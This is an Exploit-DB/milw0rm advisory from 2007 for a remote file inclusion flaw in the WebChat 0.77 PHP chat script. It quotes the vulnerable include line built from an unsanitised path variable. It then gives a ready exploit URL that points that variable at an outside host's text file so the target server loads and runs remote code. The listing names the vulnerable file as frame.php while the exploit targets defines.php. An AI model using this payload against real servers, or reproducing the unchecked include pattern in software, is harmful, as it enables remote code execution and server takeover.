WebChat 0.77 - 'defines.php?WEBCHATPATH' Remote File Inclusion

EDB-ID:

3169


Platform:

PHP

Published:

2007-01-21

######################################################################### 
# 
#           [ webchat ] 
# 
# Class:     File Include Vulnerability  
# Published  2007/1/21 
# Remote:    Yes  
# Critical   Level : Dangerous 
# Site:      http://www.easy-script.com/compt.php?id=1705  || http://sourceforge.net/projects/webdev-webchat/
# Author:    TheViper-hacker  
# Contact:   theviper-hacker@hotmail.com 
#   
#########################################################################
file ;
frame.php
======================================================
Vuln Code
include ($WEBCHATPATH.'language/english.php');
=======================================================
Exploit :       
Http:// www.Victem.0 / [ webchat-077_path] /defines.php?WEBCHATPATH=http://turnkringonzehoop.be/viper.txt?
 
 ----  Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA]  ]organza[
 ---- GreeTz: All www.4azhar.Com Members Cont : rida-10@msn.com
--------------------------------------||  Viva ISLAM ||-----------------------------------------

# milw0rm.com [2007-01-21]